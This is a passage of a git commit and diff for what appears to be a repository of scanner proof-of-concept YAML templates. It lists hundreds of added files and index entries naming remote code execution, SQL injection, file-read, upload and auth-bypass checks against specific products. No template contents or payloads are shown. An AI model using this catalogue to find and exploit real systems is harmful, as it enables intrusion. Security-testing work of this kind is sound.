poc/cve/CVE-2024-12523-3e0bf521f24a7f7e87f4a5a124f0141d.yaml create mode 100644 poc/cve/CVE-2024-12555-5cbce38a9099186c24f323bfe5404451.yaml create mode 100644 poc/cve/CVE-2024-12572.yaml create mode 100644 poc/cve/CVE-2024-12574.yaml create mode 100644 poc/cve/CVE-2024-12578-55a6532fce1626d6ca01169c30129bf3.yaml create mode 100644 poc/cve/CVE-2024-12579.yaml create mode 100644 poc/cve/CVE-2024-12581.yaml create mode 100644 poc/cve/CVE-2024-12628-d21dcffe48f9c4b21314ab529a797a81.yaml create mode 100644 poc/cve/CVE-2024-37250.yaml create mode 100644 poc/cve/CVE-2024-43222.yaml create mode 100644 poc/cve/CVE-2024-43300.yaml create mode 100644 poc/cve/CVE-2024-43968.yaml create mode 100644 poc/cve/CVE-2024-47321.yaml create mode 100644 poc/cve/CVE-2024-49323.yaml create mode 100644 poc/cve/CVE-2024-49334.yaml create mode 100644 poc/cve/CVE-2024-5029.yaml create mode 100644 poc/cve/CVE-2024-50423.yaml create mode 100644 poc/cve/CVE-2024-50504.yaml create mode 100644 poc/cve/CVE-2024-50506.yaml create mode 100644 poc/cve/CVE-2024-50507.yaml create mode 100644 poc/cve/CVE-2024-50508.yaml create mode 100644 poc/cve/CVE-2024-50509.yaml create mode 100644 poc/cve/CVE-2024-50510.yaml create mode 100644 poc/cve/CVE-2024-50511.yaml create mode 100644 poc/cve/CVE-2024-50512.yaml create mode 100644 poc/cve/CVE-2024-50513.yaml create mode 100644 poc/cve/CVE-2024-50514.yaml create mode 100644 poc/cve/CVE-2024-50515.yaml create mode 100644 poc/cve/CVE-2024-50516.yaml create mode 100644 poc/cve/CVE-2024-50550.yaml create mode 100644 poc/cve/CVE-2024-51615.yaml create mode 100644 poc/cve/CVE-2024-51647.yaml create mode 100644 poc/cve/CVE-2024-51792.yaml create mode 100644 poc/cve/CVE-2024-51815.yaml create mode 100644 poc/cve/CVE-2024-53278.yaml create mode 100644 poc/cve/CVE-2024-53725.yaml create mode 100644 poc/cve/CVE-2024-53729.yaml create mode 100644 poc/cve/CVE-2024-53737.yaml create mode 100644 poc/cve/CVE-2024-53738.yaml create mode 100644 poc/cve/CVE-2024-53739.yaml create mode 100644 poc/cve/CVE-2024-53803.yaml create mode 100644 poc/cve/CVE-2024-53804.yaml create mode 100644 poc/cve/CVE-2024-53805.yaml create mode 100644 poc/cve/CVE-2024-53807.yaml create mode 100644 poc/cve/CVE-2024-53808.yaml create mode 100644 poc/cve/CVE-2024-53812.yaml create mode 100644 poc/cve/CVE-2024-53815.yaml create mode 100644 poc/cve/CVE-2024-53817.yaml create mode 100644 poc/cve/CVE-2024-53818.yaml create mode 100644 poc/cve/CVE-2024-53819.yaml create mode 100644 poc/cve/CVE-2024-53823.yaml create mode 100644 poc/cve/CVE-2024-53824.yaml create mode 100644 poc/cve/CVE-2024-53826.yaml create mode 100644 poc/cve/CVE-2024-54206.yaml create mode 100644 poc/cve/CVE-2024-54207.yaml create mode 100644 poc/cve/CVE-2024-54212.yaml create mode 100644 poc/cve/CVE-2024-54213.yaml create mode 100644 poc/cve/CVE-2024-54214.yaml create mode 100644 poc/cve/CVE-2024-54215.yaml create mode 100644 poc/cve/CVE-2024-54216.yaml create mode 100644 poc/cve/CVE-2024-54217.yaml create mode 100644 poc/cve/CVE-2024-54218.yaml create mode 100644 poc/cve/CVE-2024-54219.yaml create mode 100644 poc/cve/CVE-2024-54220.yaml create mode 100644 poc/cve/CVE-2024-54221.yaml create mode 100644 poc/cve/CVE-2024-54223.yaml create mode 100644 poc/cve/CVE-2024-54224.yaml create mode 100644 poc/cve/CVE-2024-54225.yaml create mode 100644 poc/cve/CVE-2024-54226.yaml create mode 100644 poc/cve/CVE-2024-54227.yaml create mode 100644 poc/cve/CVE-2024-54228.yaml create mode 100644 poc/cve/CVE-2024-54230.yaml create mode 100644 poc/cve/CVE-2024-54231.yaml create mode 100644 poc/cve/CVE-2024-54232.yaml create mode 100644 poc/cve/CVE-2024-54247.yaml create mode 100644 poc/cve/CVE-2024-54250.yaml create mode 100644 poc/cve/CVE-2024-54251.yaml create mode 100644 poc/cve/CVE-2024-54253.yaml create mode 100644 poc/cve/CVE-2024-54255.yaml create mode 100644 poc/cve/CVE-2024-54260.yaml create mode 100644 poc/cve/CVE-2024-7982.yaml create mode 100644 poc/cve/CVE-2024-8157.yaml create mode 100644 poc/cve/CVE-2024-8378.yaml create mode 100644 poc/cve/CVE-2024-8444.yaml create mode 100644 poc/cve/CVE-2024-8625.yaml create mode 100644 poc/cve/CVE-2024-9111-581fc93879c1c54ef26503d9dcc6ddcf.yaml create mode 100644 poc/cve/CVE-2024-9290.yaml create mode 100644 poc/cve/CVE-2024-9422.yaml create mode 100644 poc/cve/CVE-2024-9428.yaml create mode 100644 poc/cve/CVE-2024-9608.yaml create mode 100644 poc/cve/CVE-2024-9651.yaml create mode 100644 poc/cve/CVE-2024-9698-dbff952933f5639b29a1b80e2c7a52b6.yaml create mode 100644 poc/cve/CVE-2024-9768.yaml create mode 100644 poc/cve/CVE-2024-9828.yaml create mode 100644 poc/cve/CVE-2024-9835.yaml create mode 100644 poc/cve/CVE-2024-9836.yaml create mode 100644 poc/cve/CVE-2024-9934.yaml create mode 100644 poc/cve/jeecg-boot-getTotalData-sqli-CVE-2024-48307.yaml create mode 100644 poc/detect/adbuddy-adblocker-detection.yaml create mode 100644 poc/microsoft/ims-countdown-afc1b693115a4259c31be875ae4878db.yaml create mode 100644 poc/mysql/cyberpanel-upgrademysqlstatus-rce.yaml create mode 100644 poc/other/AnyShare-Usrm_GetAllUsers-infoleak.yaml create mode 100644 poc/other/abcbiz-addons.yaml create mode 100644 poc/other/acf-frontend-form-element-37cf54b4fd530e8cbe84be3c76ac823a.yaml create mode 100644 poc/other/acf-frontend-form-element-e002b76cae1c5fe698d73bad818d1658.yaml create mode 100644 poc/other/aio-contact.yaml create mode 100644 poc/other/all-in-one-slider.yaml create mode 100644 poc/other/alphabetical-list.yaml create mode 100644 poc/other/bin-stripe-donation-a3308f3b5497bd4ba2d82def5ce6916c.yaml create mode 100644 poc/other/blizzard-quotes.yaml create mode 100644 poc/other/bodi0s-easy-cache-b25e0848713a993a19d7a570188681d3.yaml create mode 100644 poc/other/booking-system-trafft.yaml create mode 100644 poc/other/buk-appointments-ae0876cbc8a6ea5bc63f81816ddd03a6.yaml create mode 100644 poc/other/bukza-1d18f7cdcaadc800f7e99e165e820759.yaml create mode 100644 poc/other/bulk-role-change.yaml create mode 100644 poc/other/cb-logo-slider.yaml create mode 100644 poc/other/companion-portfolio-99848fed06847f56568685ec4d7abf53.yaml create mode 100644 poc/other/connatix-video-embed-078fbbdf831b8258d6e8b451d9e7fb0e.yaml create mode 100644 poc/other/crafthemes-demo-import-3d9ed4f73a1e8e89ff28ad42207f57cc.yaml create mode 100644 poc/other/designer.yaml create mode 100644 poc/other/dsdownloadlist.yaml create mode 100644 poc/other/eveeno-57163addaabbee05984ca77e6d31881e.yaml create mode 100644 poc/other/fat-services-booking.yaml create mode 100644 poc/other/fluentform-73d12813260178303738b5378f138bfb.yaml create mode 100644 poc/other/full-screen-page-background-image-slideshow.yaml create mode 100644 poc/other/ganohrs-toggle-shortcode-9c361274065595fa7c1b34cfc52539a1.yaml create mode 100644 poc/other/get-post-content-shortcode-b22e11dd16a8eba4c44d1ec8159b3556.yaml create mode 100644 poc/other/glomex-oembed-2234b2001bef09d3310372cf737d335d.yaml create mode 100644 poc/other/gmw-premium-settings.yaml create mode 100644 poc/other/hello-in-all-languages.yaml create mode 100644 poc/other/hits-counter.yaml create mode 100644 poc/other/import-eventbrite-events-fbff3ca801016ea3ccdd49c17eb80e43.yaml create mode 100644 poc/other/jinher-JC6-oaplusrangedownloadfile-filedownload.yaml create mode 100644 poc/other/jiusi-oa-dl-fileread.yaml create mode 100644 poc/other/jquery-manager.yaml create mode 100644 poc/other/kingdee_eas_pdfViewLocal_fileread.yaml create mode 100644 poc/other/kingview-KingPortal-img-fileread.yaml create mode 100644 poc/other/koalendar-free-booking-widget-ce4441524b592e785043e6070388f53a.yaml create mode 100644 poc/other/kredeum-nfts-63e1fa011074b96657eb8fc01827c46b.yaml create mode 100644 poc/other/logs-de-connexion.yaml create mode 100644 poc/other/newsmanapp.yaml create mode 100644 poc/other/newspack-plugin.yaml create mode 100644 poc/other/notibar.yaml create mode 100644 poc/other/ootb-openstreetmap.yaml create mode 100644 poc/other/planning-center-online-giving.yaml create mode 100644 poc/other/plezi-4a635b36fc2f020e6e97470ee9033e55.yaml create mode 100644 poc/other/post-to-pdf-8ab47ff832f5f5cf5ba543f690973fee.yaml create mode 100644 poc/other/post-types-carousel-slider-c7b7350193feff134087fae14530c8a3.yaml create mode 100644 poc/other/posts-and-products-views-6353d59c8166d0c7835a56c9603f6772.yaml create mode 100644 poc/other/primer-mydata.yaml create mode 100644 poc/other/products-stock-manager-with-excel.yaml create mode 100644 poc/other/property-hive-stamp-duty-calculator.yaml create mode 100644 poc/other/revy.yaml create mode 100644 poc/other/rrdevs-for-elementor.yaml create mode 100644 poc/other/shortcode-elementor-31466df2cf677a943b18b87d140554bf.yaml create mode 100644 poc/other/simple-locator-64cca06d1166ced2ac235d17d2f88e70.yaml create mode 100644 poc/other/smart-popup-blaster-38242ca08bf2b38877007cc96b7c92a1.yaml create mode 100644 poc/other/svg-shortcode.yaml create mode 100644 poc/other/sweetdate.yaml create mode 100644 poc/other/tabs-maker-daf9e2cf38c5806dd492be7fef17b720.yaml create mode 100644 poc/other/tcbd-popover-cde275ba1470f5ed86bd89d6dd9707b4.yaml create mode 100644 poc/other/the-permalinker-89aed934f46868a1f2162bc8d7aacc36.yaml create mode 100644 poc/other/themify-store-locator.yaml create mode 100644 poc/other/tianrongxin-TopSAG-download-download.yaml create mode 100644 poc/other/tickera-event-ticketing-system-5a3ee1f11c4a6d8e9eba3cf37c043750.yaml create mode 100644 poc/other/unlock-addons-for-elementor.yaml create mode 100644 poc/other/visualmodo-elements-134a8cc9ff775949b36d0becbb4ef51d.yaml create mode 100644 poc/other/wangyuxingyun_vpn_client_filedownload.yaml create mode 100644 poc/other/woo-cart-count-shortcode-ba5e554357f7d9eec7e0e2ce4da9ba5f.yaml create mode 100644 poc/other/woo-product-excel-importer.yaml create mode 100644 poc/other/wot-elementor-widgets.yaml create mode 100644 poc/other/yongyou-BIP-getolapconnectionlist-infoleak.yaml create mode 100644 poc/other/yonyou-UFIDA-NC-download-fileread.yaml create mode 100644 poc/remote_code_execution/D-Link_DNS-320-account_mgr-rce.yaml create mode 100644 poc/remote_code_execution/D-Link_DNS-320-scan_dsk-rce.yaml create mode 100644 poc/remote_code_execution/ar-for-woocommerce.yaml create mode 100644 poc/remote_code_execution/cyberpanel-upgrademysqlstatus-rce.yaml create mode 100644 poc/remote_code_execution/geodatasource-country-region-dropdown-a5f6ea64e6ade169785eed830efe7d5f.yaml create mode 100644 poc/remote_code_execution/hamlintek-ISS-7000-login_handler-rce.yaml create mode 100644 poc/remote_code_execution/kingdee_eas_apputil_rce.yaml create mode 100644 poc/remote_code_execution/meite-crm-sync_emp_weixin-rce.yaml create mode 100644 poc/remote_code_execution/min-and-max-quantity-for-woocommerce.yaml create mode 100644 poc/remote_code_execution/ni-woocommerce-order-export.yaml create mode 100644 poc/remote_code_execution/prodigy-commerce.yaml create mode 100644 poc/remote_code_execution/tianrongxin-yunweishenji-synRequest-rce.yaml create mode 100644 poc/remote_code_execution/webd-woocommerce-product-excel-importer-bulk-edit.yaml create mode 100644 poc/remote_code_execution/woocommerce-myparcel.yaml create mode 100644 poc/search/my-idx-home-search-19b216f4cb81ff6b86947c3420c19a79.yaml create mode 100644 poc/search/my-idx-home-search-cb1ebc1aa3b7aa8c2bfe19c90a10af1b.yaml create mode 100644 poc/sql/CVE-2024-11095-b0165142a699db32c27db406fb189dac.yaml create mode 100644 poc/sql/CVE-2024-11855-c68a0514b5572dba40197a1e12cc708d.yaml create mode 100644 poc/sql/CVE-2024-11867-3bf808c90c9dd0a57945a67a217dbe53.yaml create mode 100644 poc/sql/CVE-2024-11869-50ed005605a356d0d3b23edb855715d9.yaml create mode 100644 poc/sql/CVE-2024-11883-4e04efa11f08a8fa78ba4ddbbc4a6849.yaml create mode 100644 poc/sql/CVE-2024-9698-dbff952933f5639b29a1b80e2c7a52b6.yaml create mode 100644 poc/sql/adbuddy-adblocker-detection.yaml create mode 100644 poc/sql/cricket-score-e44fdb3a4ce9acdbe0ece5ab8b5a4c4a.yaml create mode 100644 poc/sql/cyberpanel-upgrademysqlstatus-rce.yaml create mode 100644 poc/sql/fanwei-Ecology-LoginSSO-sqli.yaml create mode 100644 poc/sql/fanwei-Ecology-browser-sqli-CNVD-2023-12632.yaml create mode 100644 poc/sql/ims-countdown-afc1b693115a4259c31be875ae4878db.yaml create mode 100644 poc/sql/jeecg-boot-getTotalData-sqli-CVE-2024-48307.yaml create mode 100644 poc/sql/movie-database.yaml create mode 100644 poc/sql/qiwang-ERP-drawGrid-sqli.yaml create mode 100644 poc/sql/sip-calculator-03696418e2ddb2e57359bcf1347e1091.yaml create mode 100644 poc/sql/wp-job-portal-dc870f31dbdd3ed85cf5c81a865becfd.yaml create mode 100644 poc/sql/ymc-states-map-696be7426132daf80e136f71893126db.yaml create mode 100644 poc/sql/yongyou-nc-process-sqli.yaml create mode 100644 poc/sql/yongyou-u8c-cloud-approveservlet-sqli.yaml create mode 100644 poc/sql/zhilink-SRM-quickReceiptDetail-sqli.yaml create mode 100644 poc/sql_injection/cyberpanel-upgrademysqlstatus-rce.yaml create mode 100644 poc/sql_injection/fanwei-Ecology-LoginSSO-sqli.yaml create mode 100644 poc/sql_injection/fanwei-Ecology-browser-sqli-CNVD-2023-12632.yaml create mode 100644 poc/sql_injection/jeecg-boot-getTotalData-sqli-CVE-2024-48307.yaml create mode 100644 poc/sql_injection/qiwang-ERP-drawGrid-sqli.yaml create mode 100644 poc/sql_injection/yongyou-nc-process-sqli.yaml create mode 100644 poc/sql_injection/yongyou-u8c-cloud-approveservlet-sqli.yaml create mode 100644 poc/sql_injection/zhilink-SRM-quickReceiptDetail-sqli.yaml create mode 100644 poc/upload/EKing-Base64Upload-fileupload.yaml create mode 100644 poc/upload/chanjet-TPlus-FileUploadHandler-uploadfile.yaml create mode 100644 poc/upload/filestack-upload-eef332a3e9a940fc24b6a8b85a58d6b7.yaml create mode 100644 poc/upload/h3c-CAS-CVM-fd-uploadfile.yaml create mode 100644 poc/upload/inspur-GS-UploadListFile-uploadfile.yaml create mode 100644 poc/upload/jinhuadijia-weixinshangqiang-mobile-fileupload.yaml create mode 100644 poc/upload/meite-crm-upload-upload.yaml create mode 100644 poc/upload/nuuo-upload-uploadfile.yaml create mode 100644 poc/upload/poguanjia-erp-uploadimgnocheck-fileupload.yaml create mode 100644 poc/upload/yongyou-u8c-esnserver-fileupload.yaml create mode 100644 poc/upload/yonyou-U8clouderp-upload-uploadfile.yaml create mode 100644 poc/web/lanling-oa-hrstaffwebservice-fileread.yaml create mode 100644 poc/web/webd-woocommerce-product-excel-importer-bulk-edit.yaml create mode 100644 poc/wordpress/indeed-wp-superbackup.yaml create mode 100644 poc/wordpress/jlayer-parallax-slider-wp.yaml create mode 100644 poc/wordpress/jwp-a11y.yaml create mode 100644 poc/wordpress/real-wp-shop-lite.yaml create mode 100644 poc/wordpress/users-import-export-with-excel-for-wp.yaml create mode 100644 poc/wordpress/wp-ad-guru-bb28f01cd39849324f89e02e0f2950e5.yaml create mode 100644 poc/wordpress/wp-auctions.yaml create mode 100644 poc/wordpress/wp-donimedia-carousel.yaml create mode 100644 poc/wordpress/wp-job-portal-0fd8a0f3624a9ac01ba2ce3c3af9b360.yaml create mode 100644 poc/wordpress/wp-job-portal-44ca926d802c7e810b6f185672896cf3.yaml create mode 100644 poc/wordpress/wp-job-portal-ac656f0515b546b4fd6aadacc13c1a52.yaml create mode 100644 poc/wordpress/wp-job-portal-ae4beac744bf60cad4d49b935292f33a.yaml create mode 100644 poc/wordpress/wp-job-portal-dc870f31dbdd3ed85cf5c81a865becfd.yaml create mode 100644 poc/wordpress/wp-job-portal-fa33fbce4070912e4a2de446cc7f9493.yaml create mode 100644 poc/wordpress/wp-photo-text-slider-50-b363eafeebe4e86c4b8a3cfae536824b.yaml create mode 100644 poc/wordpress/wp-tithely.yaml create mode 100644 poc/wordpress/wpcasa.yaml diff --git a/date.txt b/date.txt index dba749d567..ae0d5cf829 100644 --- a/date.txt +++ b/date.txt @@ -1 +1 @@ -20241213 +20241214 diff --git a/poc.txt b/poc.txt index 685556a160..0b9baa0ed8 100644 --- a/poc.txt +++ b/poc.txt @@ -3136,6 +3136,7 @@ ./poc/auth/fake-referer-header-auth-bypass.yaml ./poc/auth/fancier-author-box-7cc7e63c608b1490036ac810d817183e.yaml ./poc/auth/fancier-author-box.yaml +./poc/auth/fanwei-Ecology-LoginSSO-sqli.yaml ./poc/auth/fanwei-byPass-login.yaml ./poc/auth/fanwei-eweaver-pluginviewservlet-unauth.yaml ./poc/auth/fanwei-login-bypass.yaml @@ -3468,6 +3469,7 @@ ./poc/auth/hadoop-unauthenticated-access.yaml ./poc/auth/hadoop-yarn-unauth.yaml ./poc/auth/hadoop-yarn-unauth.yml +./poc/auth/hamlintek-ISS-7000-login_handler-rce.yaml ./poc/auth/hand-srm-auth-bypass.yaml ./poc/auth/haofeng-firewall-setdomain-unauth.yaml ./poc/auth/hardcoded-api-keys.yaml @@ -3623,6 +3625,7 @@ ./poc/auth/idemia-biometrics-default-login-8141.yaml ./poc/auth/idemia-biometrics-default-login.yaml ./poc/auth/identification-auth-failures.yaml +./poc/auth/ider-login-77ccffccfac1bb6eac46823913cc705c.yaml ./poc/auth/ikuai-login-panel.yaml ./poc/auth/imgproxy-unauth.yaml ./poc/auth/imm-default-login.yaml @@ -4187,6 +4190,7 @@ ./poc/auth/microsoft-exchange-login.yaml ./poc/auth/mikrotik-routeros-login-page.yaml ./poc/auth/milesightvpn-etc-passwd-fileread.yaml +./poc/auth/mingyuanyun_ERP_GetErpConfig_unauthorized.yaml ./poc/auth/minimum-password-age-zero.yaml ./poc/auth/minio-default-login(1).yaml ./poc/auth/minio-default-login-1.yaml @@ -5308,6 +5312,7 @@ ./poc/auth/solarwinds-default-login-10356.yaml ./poc/auth/solarwinds-default-login-2.yaml ./poc/auth/solarwinds-default-login.yaml +./poc/auth/solr-PKIAuthenticationPlugin-admin-bypass.yaml ./poc/auth/somfy-login-10371.yaml ./poc/auth/somfy-login-10372.yaml ./poc/auth/somfy-login-10373.yaml @@ -6144,6 +6149,7 @@ ./poc/auth/yith-woocommerce-social-login-a472e8d344476ac1fe5c7a6c4cbb802f.yaml ./poc/auth/yith-woocommerce-social-login-f5c3285c546d26859e884d10b1091900.yaml ./poc/auth/yith-woocommerce-social-login.yaml +./poc/auth/yongyou-BIP-yonbiplogin-fileread.yaml ./poc/auth/yongyou-KSOA-servletimagefield-sKeyvalue-sqli.yaml ./poc/auth/yongyou-u8-KeyWordDetailReportQuery-sql-Injection.yaml ./poc/auth/yongyou-u8-RegisterServlet-sql-Injection.yaml @@ -7059,6 +7065,7 @@ ./poc/backup/flickr-picture-backup.yaml ./poc/backup/froxlor-database-backup.yaml ./poc/backup/indeed-wp-superbackup-617a1d8a65bee9cf7b98f71587d5bbf1.yaml +./poc/backup/indeed-wp-superbackup.yaml ./poc/backup/keep-backup-daily-327b6a6a640edb13bfc96ce69665c4fa.yaml ./poc/backup/keep-backup-daily-4c652bcfb4201d0cbb1802dd87b49532.yaml ./poc/backup/keep-backup-daily-787820acd6b94f794c54239b32b10a99.yaml @@ -7637,6 +7644,7 @@ ./poc/cnvd/ecshop-cnvd-2020-58823-sqli.yml ./poc/cnvd/eea-info-leak-cnvd-2021-10543.yaml ./poc/cnvd/eea-info-leak-cnvd-2021-10543.yml +./poc/cnvd/fanwei-Ecology-browser-sqli-CNVD-2023-12632.yaml ./poc/cnvd/h5s-video-platform-cnvd-2020-67113-unauth.yaml ./poc/cnvd/h5s-video-platform-cnvd-2020-67113-unauth.yml ./poc/cnvd/joomla-cnvd-2019-34135-rce.yaml @@ -8117,6 +8125,7 @@ ./poc/config/magento-config.yaml ./poc/config/manageengine-network-config.yaml ./poc/config/micollab_audio,_web_&_video_conferencing.yaml +./poc/config/mingyuanyun_ERP_GetErpConfig_unauthorized.yaml ./poc/config/misconfig.yaml ./poc/config/misconfigured-concrete5.yaml ./poc/config/misconfigured-docker-8900.yaml @@ -9209,6 +9218,7 @@ ./poc/cve/CVE-2011-5106-2096.yaml ./poc/cve/CVE-2011-5106.yaml ./poc/cve/CVE-2011-5107-2098.yaml +./poc/cve/CVE-2011-5107-2102.yaml ./poc/cve/CVE-2011-5107-2104.yaml ./poc/cve/CVE-2011-5107-4c5dcdac42f06a71adb7271143d88793.yaml ./poc/cve/CVE-2011-5107.yaml @@ -10260,6 +10270,7 @@ ./poc/cve/CVE-2014-4536-2350.yaml ./poc/cve/CVE-2014-4536-2351.yaml ./poc/cve/CVE-2014-4536-2353.yaml +./poc/cve/CVE-2014-4536-2354.yaml ./poc/cve/CVE-2014-4536-c40ca00b1126e4382a5ed06f07d970fe.yaml ./poc/cve/CVE-2014-4536.yaml ./poc/cve/CVE-2014-4537-f13b343f9c9b9dece35e3b7d0c291a51.yaml @@ -10712,6 +10723,7 @@ ./poc/cve/CVE-2014-9094-2417.yaml ./poc/cve/CVE-2014-9094-2420.yaml ./poc/cve/CVE-2014-9094-2421.yaml +./poc/cve/CVE-2014-9094-2422.yaml ./poc/cve/CVE-2014-9094-33981699600bd7688fa76839ea64eb69.yaml ./poc/cve/CVE-2014-9094.yaml ./poc/cve/CVE-2014-9097-185f364a811c7ac717748c28afbba129.yaml @@ -11108,6 +11120,7 @@ ./poc/cve/CVE-2015-2794 (copy 1).yaml ./poc/cve/CVE-2015-2794.yaml ./poc/cve/CVE-2015-2807-2497.yaml +./poc/cve/CVE-2015-2807-2500.yaml ./poc/cve/CVE-2015-2807-900a53ae0846b5347a5a43a6953175d4.yaml ./poc/cve/CVE-2015-2807.yaml ./poc/cve/CVE-2015-2824-abe81889bc2f1d741112f2dc9ccacef0.yaml @@ -12751,6 +12764,7 @@ ./poc/cve/CVE-2017-16955.yaml ./poc/cve/CVE-2017-17043-08130ba3bd49cd34b98615982fe7f7a9.yaml ./poc/cve/CVE-2017-17043-2975.yaml +./poc/cve/CVE-2017-17043-2977.yaml ./poc/cve/CVE-2017-17043.yaml ./poc/cve/CVE-2017-17058.yaml ./poc/cve/CVE-2017-17059-2978.yaml @@ -15256,6 +15270,7 @@ ./poc/cve/CVE-2019-25218-a65f297de2dde5d301565d73e653f356.yaml ./poc/cve/CVE-2019-25218.yaml ./poc/cve/CVE-2019-25221-86298068dfd5127aa948cb7fa748c15a.yaml +./poc/cve/CVE-2019-25221.yaml ./poc/cve/CVE-2019-2578-1.yaml ./poc/cve/CVE-2019-2578-2.yaml ./poc/cve/CVE-2019-2578.yaml @@ -15571,6 +15586,7 @@ ./poc/cve/CVE-2020-10966.yaml ./poc/cve/CVE-2020-10973.yaml ./poc/cve/CVE-2020-11023-3beb604b5149be28498143011514aa9e.yaml +./poc/cve/CVE-2020-11023.yaml ./poc/cve/CVE-2020-11025-2967734c4ace9cc5abf86caf7a7b7f4d.yaml ./poc/cve/CVE-2020-11025.yaml ./poc/cve/CVE-2020-11026-27df0ea7c6590b827fd75993432bfee2.yaml @@ -16222,6 +16238,7 @@ ./poc/cve/CVE-2020-24148.yaml ./poc/cve/CVE-2020-24149-f17b476af9729c706149033214bc1201.yaml ./poc/cve/CVE-2020-24149.yaml +./poc/cve/CVE-2020-24186-4793.yaml ./poc/cve/CVE-2020-24186-4794.yaml ./poc/cve/CVE-2020-24186-4797.yaml ./poc/cve/CVE-2020-24186-4798.yaml @@ -16551,6 +16568,7 @@ ./poc/cve/CVE-2020-35200.yaml ./poc/cve/CVE-2020-35234-4ad486f8d142a386c5ede03d65e1f4af.yaml ./poc/cve/CVE-2020-35234-5025.yaml +./poc/cve/CVE-2020-35234-5026.yaml ./poc/cve/CVE-2020-35234.yaml ./poc/cve/CVE-2020-35235-e24fd8e9d3e4c5cd7358a2f299593578.yaml ./poc/cve/CVE-2020-35235.yaml @@ -19536,6 +19554,7 @@ ./poc/cve/CVE-2021-25109.yaml ./poc/cve/CVE-2021-25110-a5ef4cd3e6eaf436924d83f61b36f76a.yaml ./poc/cve/CVE-2021-25110.yaml +./poc/cve/CVE-2021-25111-5802.yaml ./poc/cve/CVE-2021-25111-5803.yaml ./poc/cve/CVE-2021-25111-e640acbee9a077ca1d863383eb2c8ddd.yaml ./poc/cve/CVE-2021-25111.yaml @@ -22023,9 +22042,11 @@ ./poc/cve/CVE-2022-1594.yaml ./poc/cve/CVE-2022-1595-0e73bbe25b7940a09c9eef8f51053411.yaml ./poc/cve/CVE-2022-1595.yaml +./poc/cve/CVE-2022-1597-6652.yaml ./poc/cve/CVE-2022-1597-ce492abfcf1c06730d5d8f86090810b4.yaml ./poc/cve/CVE-2022-1597.yaml ./poc/cve/CVE-2022-1598-6653.yaml +./poc/cve/CVE-2022-1598-6654.yaml ./poc/cve/CVE-2022-1598-a0e50bca828ab26f40098be59c4594f6.yaml ./poc/cve/CVE-2022-1598.yaml ./poc/cve/CVE-2022-1599-35094c7c694f8c5f158da4361ba07f3c.yaml @@ -28334,6 +28355,7 @@ ./poc/cve/CVE-2023-24406-415771c263c92bfdf7d8fad679773904.yaml ./poc/cve/CVE-2023-24406.yaml ./poc/cve/CVE-2023-24407-725d247a52bd9564ba0263d24a049d49.yaml +./poc/cve/CVE-2023-24407.yaml ./poc/cve/CVE-2023-24408-f203349881127b9daadd2182e52b859a.yaml ./poc/cve/CVE-2023-24408.yaml ./poc/cve/CVE-2023-24409-5841f0be8a729bd6e8be7d17fda60072.yaml @@ -33887,6 +33909,7 @@ ./poc/cve/CVE-2023-49195-58dcc7c6367c8732f7f3919179f0dcd4.yaml ./poc/cve/CVE-2023-49195.yaml ./poc/cve/CVE-2023-49196-1f41ce4580ff2a6b6234baa60b4e1aca.yaml +./poc/cve/CVE-2023-49196.yaml ./poc/cve/CVE-2023-49197-f5a31bffb7daba1605db44e8eb088947.yaml ./poc/cve/CVE-2023-49197.yaml ./poc/cve/CVE-2023-4920-6255af82ed09be88e8e3a76fcd2aac11.yaml @@ -36694,6 +36717,7 @@ ./poc/cve/CVE-2024-10008-4e1fc9966938dc414b06dd519e73122b.yaml ./poc/cve/CVE-2024-10008.yaml ./poc/cve/CVE-2024-10010-951aa2e5ac7c686265be838ce5e0fe9f.yaml +./poc/cve/CVE-2024-10010.yaml ./poc/cve/CVE-2024-10011-eefe8c0c540af6a79376e37c4cbbfad9.yaml ./poc/cve/CVE-2024-10011.yaml ./poc/cve/CVE-2024-10014-287fb7ccc9db018318f62de1bc8e246a.yaml @@ -36751,6 +36775,7 @@ ./poc/cve/CVE-2024-10103-9cb43f1245b0f9d854f9ad1261997a0c.yaml ./poc/cve/CVE-2024-10103.yaml ./poc/cve/CVE-2024-10104-b84d2405dfa0880c1a70b2a3fad82d45.yaml +./poc/cve/CVE-2024-10104.yaml ./poc/cve/CVE-2024-10108-caa219ca69a3786bb9c03f5b9d9a5323.yaml ./poc/cve/CVE-2024-10108.yaml ./poc/cve/CVE-2024-10111-4d3e28e414d06c889d3789abaec95671.yaml @@ -36769,6 +36794,7 @@ ./poc/cve/CVE-2024-10124-2ea452da1894ecbc4a5b2c3a94009474.yaml ./poc/cve/CVE-2024-10124.yaml ./poc/cve/CVE-2024-10146-7c5ec1542ecba7c343e02aa01e7c0776.yaml +./poc/cve/CVE-2024-10146.yaml ./poc/cve/CVE-2024-10147-002fcce0581627f4a9b1f3dab00143e0.yaml ./poc/cve/CVE-2024-10147.yaml ./poc/cve/CVE-2024-10148-66e8a68a811d5893a9baabebb92f1d1e.yaml @@ -36941,8 +36967,11 @@ ./poc/cve/CVE-2024-10470-03018950e373c0e8746e1508abb3b26d.yaml ./poc/cve/CVE-2024-10470.yaml ./poc/cve/CVE-2024-10471-73a898dfd96211fb8e950b5570e3fb68.yaml +./poc/cve/CVE-2024-10471.yaml ./poc/cve/CVE-2024-10473-4bd3b2366c1ef349a8ea2852cdba87bd.yaml +./poc/cve/CVE-2024-10473.yaml ./poc/cve/CVE-2024-10480-c478c5a474eb7197d1a2e40d153a7824.yaml +./poc/cve/CVE-2024-10480.yaml ./poc/cve/CVE-2024-10482-845ce866c54cd77aff0707f285c1d085.yaml ./poc/cve/CVE-2024-10482.yaml ./poc/cve/CVE-2024-10484-cca8c7f3c8f18f65013d62c1a06a3b0d.yaml @@ -36952,6 +36981,7 @@ ./poc/cve/CVE-2024-1049-0e66fa189b7475aa8bef5ee2db21f9f7.yaml ./poc/cve/CVE-2024-1049.yaml ./poc/cve/CVE-2024-10493-0ea5d1ba204f4cd4e380f96698fb397e.yaml +./poc/cve/CVE-2024-10493.yaml ./poc/cve/CVE-2024-1050-27175c3a9c41e19f3b6754fd15e6284b.yaml ./poc/cve/CVE-2024-1050.yaml ./poc/cve/CVE-2024-10508-9305c56dd865940b821d574327597953.yaml @@ -36959,12 +36989,15 @@ ./poc/cve/CVE-2024-1051-5e8b58bda7c4c85d551a1bc3c6ff7348.yaml ./poc/cve/CVE-2024-1051.yaml ./poc/cve/CVE-2024-10510-78ba2ace6fdbb75ae1b6ae5ea60bf1ea.yaml +./poc/cve/CVE-2024-10510.yaml ./poc/cve/CVE-2024-10515-5613c1285c13db3e8e7567a1d6eaba45.yaml ./poc/cve/CVE-2024-10515.yaml ./poc/cve/CVE-2024-10516-90da3b799283fae5783fef07a67bdeef.yaml 